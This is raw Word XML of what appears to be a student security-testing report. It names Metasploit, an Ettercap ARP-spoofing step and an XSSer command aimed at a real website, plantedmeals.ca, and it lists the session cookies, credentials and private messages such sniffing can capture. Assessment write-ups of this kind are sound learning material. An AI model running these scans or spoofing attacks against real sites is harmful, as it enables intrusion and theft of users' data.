            <wp:docPr id="179805490" name="그림 1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5490" name="그림 1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20BF" w14:textId="6B8B33F9" w:rsidR="008006B6" w:rsidRDefault="008006B6">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5655C992" w14:textId="71DF8D3A" w:rsidR="008006B6" w:rsidRDefault="009A7563" w:rsidP="009B78F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Metasploit (exploitation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510B4F1B" w14:textId="671AF642" w:rsidR="009A7563" w:rsidRDefault="009A7563" w:rsidP="009B78F3">
      <w:r w:rsidRPr="009A7563">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10663020" wp14:editId="4E401816">
            <wp:extent cx="5731510" cy="4925060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="653212862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12862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02B7" w14:textId="1C5D4195" w:rsidR="009A7563" w:rsidRDefault="00CC6E30" w:rsidP="009B78F3">
      <w:r w:rsidRPr="00CC6E30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26770481" wp14:editId="72C71D11">
            <wp:extent cx="5731510" cy="1643380"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="206004674" name="그림 1" descr="텍스트, 스크린샷, 소프트웨어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4674" name="그림 1" descr="텍스트, 스크린샷, 소프트웨어, 폰트이(가) 표시된 사진&#10;&#10;AI가 생성한 콘텐츠는 부정확할 수 있습니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can</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">t use </w:t>
      </w:r>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool since it is blocked by firewall and port 445 is filtered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2226831F" w14:textId="3A8111E8" w:rsidR="00ED0BA5" w:rsidRDefault="00ED0BA5">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0498BC5D" w14:textId="0473E598" w:rsidR="00ED0BA5" w:rsidRDefault="005B50A5" w:rsidP="009B78F3">
      <w:r w:rsidRPr="005B50A5">
        <w:lastRenderedPageBreak/>
        <w:t>Ettercap (Network Sniffing, MITM, Spoofing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2306168E" w14:textId="0C54C6AB" w:rsidR="005B50A5" w:rsidRDefault="005B50A5" w:rsidP="005B50A5">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B50A5">
        <w:t>Start Ettercap in Text Mode (General Sniffing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686FB1EA" w14:textId="407B79EC" w:rsidR="005B50A5" w:rsidRDefault="005B50A5" w:rsidP="005B50A5">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B50A5">
        <w:t xml:space="preserve">ARP Spoofing Attack on </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="005B50A5">
          <w:rPr>
            <w:rStyle w:val="aa"/>
          </w:rPr>
          <w:t>www.plantedmeals.ca</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70970A4B" w14:textId="117D8A1F" w:rsidR="005B50A5" w:rsidRDefault="005B50A5" w:rsidP="005B50A5">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="800"/>
      </w:pPr>
      <w:r w:rsidRPr="005B50A5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18288634" wp14:editId="5B186C55">
            <wp:extent cx="5731510" cy="4745990"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="53962354" name="그림 1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2354" name="그림 1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C45A" w14:textId="43EE0883" w:rsidR="005B50A5" w:rsidRDefault="005B50A5" w:rsidP="005B50A5">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="800"/>
      </w:pPr>
      <w:r w:rsidRPr="005B50A5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DC954BF" wp14:editId="4989FFB7">
            <wp:extent cx="5731510" cy="3947160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="756557967" name="그림 1" descr="텍스트, 스크린샷, 폰트, 메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57967" name="그림 1" descr="텍스트, 스크린샷, 폰트, 메뉴이(가) 표시된 사진&#10;&#10;AI가 생성한 콘텐츠는 부정확할 수 있습니다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5A4E" w14:textId="77777777" w:rsidR="00716934" w:rsidRDefault="00716934" w:rsidP="00716934">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="800"/>
      </w:pPr>
      <w:r>
        <w:t>Data You Can Capture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66832D43" w14:textId="30BB0084" w:rsidR="00716934" w:rsidRDefault="00716934" w:rsidP="00716934">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Unencrypted Traffic (HTTP, FTP, POP3, IMAP, SMTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516C55C1" w14:textId="22D7D4B4" w:rsidR="00716934" w:rsidRDefault="00716934" w:rsidP="00716934">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Login Credentials (Usernames, Passwords from non-HTTPS sites)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4422B4F7" w14:textId="3F37F6DC" w:rsidR="00716934" w:rsidRDefault="00716934" w:rsidP="00716934">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Session Cookies (Can be used to hijack sessions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02853822" w14:textId="42E21A5A" w:rsidR="00716934" w:rsidRDefault="00716934" w:rsidP="00716934">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Banking and Shopping Info (If the victim is on an insecure site)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC72001" w14:textId="32DBA531" w:rsidR="00716934" w:rsidRDefault="00716934" w:rsidP="00716934">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Email Communications (If email is sent via an insecure protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3123B449" w14:textId="23A1F845" w:rsidR="00716934" w:rsidRDefault="00716934" w:rsidP="00716934">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>VoIP Conversations (If captured in clear text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18329DEC" w14:textId="7553F3C0" w:rsidR="005B50A5" w:rsidRDefault="00716934" w:rsidP="00716934">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Private Messages (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Social Media</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, Forums, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBADD3F" w14:textId="556B4DCA" w:rsidR="00716934" w:rsidRDefault="00716934" w:rsidP="00716934">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ince </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> am conducting static vulnerability scan, this might not be suitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B278341" w14:textId="30B3DD86" w:rsidR="00416F04" w:rsidRDefault="00416F04">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4625D5" w14:textId="1F5D2112" w:rsidR="00716934" w:rsidRDefault="00E16D90" w:rsidP="00716934">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E16D90">
        <w:lastRenderedPageBreak/>
        <w:t>XSSer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E16D90">
        <w:t xml:space="preserve"> – Automated XSS Testing Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D89BC7C" w14:textId="2CC814A5" w:rsidR="00E16D90" w:rsidRDefault="0059669D" w:rsidP="00716934">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059669D">
        <w:t>xsser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0059669D">
        <w:t xml:space="preserve"> -u "https://www.plantedmeals.ca" -c 100 </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0059669D">
        <w:t>Cl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0059669D">
        <w:t>Crawling for Input Fields</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563FD3AF" w14:textId="26B28109" w:rsidR="0059669D" w:rsidRDefault="00C322B5" w:rsidP="00716934">
      <w:r w:rsidRPr="00C322B5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="290D0F36" wp14:editId="380FA954">
            <wp:extent cx="5731510" cy="2296160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="132850042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0042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035D" w14:textId="6C7A8D08" w:rsidR="00C322B5" w:rsidRDefault="00C322B5" w:rsidP="00716934">
      <w:r w:rsidRPr="00C322B5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="348155A2" wp14:editId="7CCF77C1">
            <wp:extent cx="5731510" cy="1204595"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1325417295" name="그림 1" descr="스크린샷, 텍스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17295" name="그림 1" descr="스크린샷, 텍스트이(가) 표시된 사진&#10;&#10;AI가 생성한 콘텐츠는 부정확할 수 있습니다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67CB" w14:textId="77777777" w:rsidR="003125F8" w:rsidRDefault="003125F8" w:rsidP="00716934"/>
    <w:p w14:paraId="5779F6CA" w14:textId="77777777" w:rsidR="003125F8" w:rsidRPr="0059669D" w:rsidRDefault="003125F8" w:rsidP="00716934"/>
    <w:sectPr w:rsidR="003125F8" w:rsidRPr="0059669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7878D3" w14:textId="77777777" w:rsidR="008006B6" w:rsidRDefault="008006B6" w:rsidP="008006B6">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="05D31249" w14:textId="77777777" w:rsidR="008006B6" w:rsidRDefault="008006B6" w:rsidP="008006B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8CB1FC" w14:textId="77777777" w:rsidR="008006B6" w:rsidRDefault="008006B6" w:rsidP="008006B6">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="09B87FBD" w14:textId="77777777" w:rsidR="008006B6" w:rsidRDefault="008006B6" w:rsidP="008006B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BF26C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABDEED6A"/>
    <w:lvl w:ilvl="0" w:tplc="04090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="23761E8C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6548FB06"/>
    <w:lvl w:ilvl="0" w:tplc="F3B86BB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40709132">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1850753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FCF"/>
    <w:rsid w:val="00106AA2"/>
    <w:rsid w:val="00116B2C"/>
    <w:rsid w:val="001B2E3F"/>
    <w:rsid w:val="001E6117"/>
    <w:rsid w:val="002B625B"/>
    <w:rsid w:val="003125F8"/>
    <w:rsid w:val="0038021E"/>
    <w:rsid w:val="00395AD3"/>
    <w:rsid w:val="003F44C7"/>
    <w:rsid w:val="00416EBE"/>
    <w:rsid w:val="00416F04"/>
    <w:rsid w:val="00442FF1"/>
    <w:rsid w:val="004910C6"/>
    <w:rsid w:val="004C39D0"/>
    <w:rsid w:val="00562173"/>
    <w:rsid w:val="0059669D"/>
    <w:rsid w:val="005B47EA"/>
    <w:rsid w:val="005B50A5"/>
    <w:rsid w:val="006545B6"/>
    <w:rsid w:val="0069446A"/>
    <w:rsid w:val="006A0FB9"/>
    <w:rsid w:val="006F2D84"/>
    <w:rsid w:val="00715C32"/>
    <w:rsid w:val="00716934"/>
    <w:rsid w:val="00764EA7"/>
    <w:rsid w:val="008006B6"/>
    <w:rsid w:val="00852FF5"/>
    <w:rsid w:val="0089460B"/>
    <w:rsid w:val="009055AC"/>
    <w:rsid w:val="009123B3"/>
    <w:rsid w:val="00986062"/>
    <w:rsid w:val="009A511E"/>
    <w:rsid w:val="009A7563"/>
    <w:rsid w:val="009B78F3"/>
    <w:rsid w:val="00A56B6B"/>
    <w:rsid w:val="00B87FCF"/>
    <w:rsid w:val="00B926C1"/>
    <w:rsid w:val="00BA39DD"/>
    <w:rsid w:val="00BF3D0E"/>
    <w:rsid w:val="00C322B5"/>
    <w:rsid w:val="00CC6E30"/>
    <w:rsid w:val="00DE19E2"/>
    <w:rsid w:val="00E16D90"/>
    <w:rsid w:val="00E74CE9"/>
    <w:rsid w:val="00E80130"/>
    <w:rsid w:val="00ED0BA5"/>
    <w:rsid w:val="00F35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8DCFD2E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CBCB0B68-B64C-4A8D-90DC-CBDE87033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87FC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87F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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87FC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87F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87FC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87FC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87F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87FC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87FC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87FC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87F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87FC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87FCF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9A511E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9A511E"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char3"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008006B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c"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008006B6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char4"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008006B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d"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008006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45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://www.plantedmeals.ca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plantedmeals.ca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14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Kim, Jackie</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kim, Jackie</cp:lastModifiedBy>
  <cp:revision>34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-01T21:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-03T00:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>